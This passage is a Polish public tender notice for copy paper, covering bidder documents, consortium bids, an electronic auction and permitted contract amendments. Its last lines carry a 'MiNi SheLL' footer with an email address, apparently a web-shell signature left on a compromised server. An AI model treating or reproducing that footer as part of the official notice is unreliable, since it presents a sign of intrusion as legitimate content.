                  finansowych innych podmiotów niezależnie od charakteru prawnego łączących go 
                  z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami 
                  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym
                  celu: 
8.4.1. pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
9.W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:

9.1.oświadczenie na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
9.2.aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy. (UWAGA: W przypadku osób fizycznych Zamawiający uzna za wystarczające złożenie oświadczenia, o którym mowa w pkt. 9.3.1. siwz na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty).

9.3.Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 specyfikacji istotnych warunków zamówienia, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.3. i 9.2.4.  specyfikacji istotnych warunków zamówienia, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.3 specyfikacji istotnych warunków zamówienia, odnoszące się do tych podmiotów.
10.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca zobowiązany jest złożyć wraz z ofertą:
10.1.specyfikację wydaną przez producenta oferowanego papieru ksero, potwierdzającą, że oferowany papier spełnia wymogi określone przez Zamawiającego w pkt. 3.2. specyfikacji,
10.2.próbki oferowanego papieru ksero, opisane i opakowane w oryginalne fabryczne opakowania zgodnie z zapisem pkt. 3.19. specyfikacji istotnych warunków zamówienia.
11.Oferta wspólna
12.5.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania: 
12.5.1.1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia 
Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich 
w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
12.5.1.2. Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a) postępowania o zamówienie publiczne, którego dotyczy;
b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)	ustanowionego Pełnomocnika oraz zakres jego umocowania;
12.5.1.3. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców; 
12.5.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 ustawy. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. specyfikacji istotnych warunków zamówienia podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.3.2. dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców;
12.5.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. specyfikacji istotnych warunków zamówienia)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. specyfikacji istotnych warunków zamówienia podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;

12.5.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie 
z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.

12.5.3.  Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

12.6. W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: Zamawiający przewiduje dokonanie wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej. Aukcja elektroniczna będzie prowadzona na stronie: http://aukcje.um.warszawa.pl</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                  umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi  
                  okoliczności, których nie  można było przewidzieć w chwili zawarcia umowy lub 
                  zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza możliwość 
                  zmiany umowy w szczególności w następujących przypadkach:
a) zmiany stawki podatku od towarów i usług (VAT);
b) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
c) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej umowy;
d) ograniczenia zakresu rzeczowego i finansowego;
e)zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
       f) zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania Przedmiotu 
           niniejszej umowy;
       g) zmiany adresów dostarczania papieru kserograficznego.
    1.22.2.Wykonawca może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, 
               których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie 
               dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi 
               Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony 
               uprzednio innym Podwykonawcom.
    1.22.3. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem
                nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2011 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com